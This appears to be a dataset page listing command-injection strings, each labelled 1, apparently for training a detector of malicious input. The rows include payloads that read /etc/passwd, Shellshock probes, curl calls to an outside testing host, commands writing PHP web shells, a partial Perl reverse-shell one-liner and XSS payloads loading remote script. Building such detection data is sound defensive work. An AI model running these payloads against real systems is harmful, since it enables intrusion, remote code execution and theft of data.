sentence string | Label int64 |
|---|---|
system('cat /etc/passwd'); | 1 |
<?php system("cat /etc/passwd");?> | 1 |
` | 1 |
|| | 1 |
| | 1 |
; | 1 |
' | 1 |
'" | 1 |
' | 1 |
& | 1 |
&& | 1 |
%0a | 1 |
%0a%0d | 1 |
null | 1 |
%0Aid | 1 |
%0a id %0a | 1 |
%0Aid%0A | 1 |
%0a ping -i 30 127.0.0.1 %0a | 1 |
%0A/usr/bin/id | 1 |
%0A/usr/bin/id%0A | 1 |
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 | 1 |
%20{${phpinfo()}} | 1 |
%20{${sleep(20)}} | 1 |
%20{${sleep(3)}} | 1 |
a|id| | 1 |
a;id| | 1 |
a;id; | 1 |
a;id\n | 1 |
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12 | 1 |
| curl http://crowdshield.com/.testing/rce.txt | 1 |
& curl http://crowdshield.com/.testing/rce.txt | 1 |
; curl https://crowdshield.com/.testing/rce_vuln.txt | 1 |
&& curl https://crowdshield.com/.testing/rce_vuln.txt | 1 |
curl https://crowdshield.com/.testing/rce_vuln.txt | 1 |
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt | 1 |
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt | 1 |
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) | 1 |
dir | 1 |
| dir | 1 |
; dir | 1 |
$(`dir`) | 1 |
& dir | 1 |
&&dir | 1 |
&& dir | 1 |
| dir C:\ | 1 |
; dir C:\ | 1 |
& dir C:\ | 1 |
&& dir C:\ | 1 |
dir C:\ | 1 |
| dir C:\Documents and Settings\* | 1 |
; dir C:\Documents and Settings\* | 1 |
& dir C:\Documents and Settings\* | 1 |
&& dir C:\Documents and Settings\* | 1 |
dir C:\Documents and Settings\* | 1 |
| dir C:\Users | 1 |
; dir C:\Users | 1 |
& dir C:\Users | 1 |
&& dir C:\Users | 1 |
dir C:\Users | 1 |
;echo%20'<script>alert(1)</script>' | 1 |
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX | 1 |
| echo "<?php include($_GET['page'])| ?>" > rfi.php | 1 |
; echo "<?php include($_GET['page']); ?>" > rfi.php | 1 |
& echo "<?php include($_GET['page']); ?>" > rfi.php | 1 |
&& echo "<?php include($_GET['page']); ?>" > rfi.php | 1 |
echo "<?php include($_GET['page']); ?>" > rfi.php | 1 |
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php | 1 |
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php | 1 |
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php | 1 |
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php | 1 |
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php | 1 |
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php | 1 |
; echo "<?php system($_GET['cmd']); ?>" > cmd.php | 1 |
& echo "<?php system($_GET['cmd']); ?>" > cmd.php | 1 |
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php | 1 |
echo "<?php system($_GET['cmd']); ?>" > cmd.php | 1 |
;echo '<script>alert(1)</script>' | 1 |
echo '<script>alert(1)</script>'// XXXXXXXXXXX | 1 |
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX | 1 |
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S | 1 |
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S | 1 |
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S | 1 |
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S | 1 |
echo "use Socket;$i="192.168.16.151";$p=443;socket(S | 1 |
() { :;}; echo vulnerable 10 | 1 |
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') | 1 |
eval('ls') | 1 |
eval('pwd') | 1 |
eval('pwd'); | 1 |
eval('sleep 5') | 1 |
eval('sleep 5'); | 1 |
eval('whoami') | 1 |
eval('whoami'); | 1 |
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') | 1 |
exec('ls') | 1 |
exec('pwd') | 1 |
exec('pwd'); | 1 |
exec('sleep 5') | 1 |
exec('sleep 5'); | 1 |
exec('whoami') | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.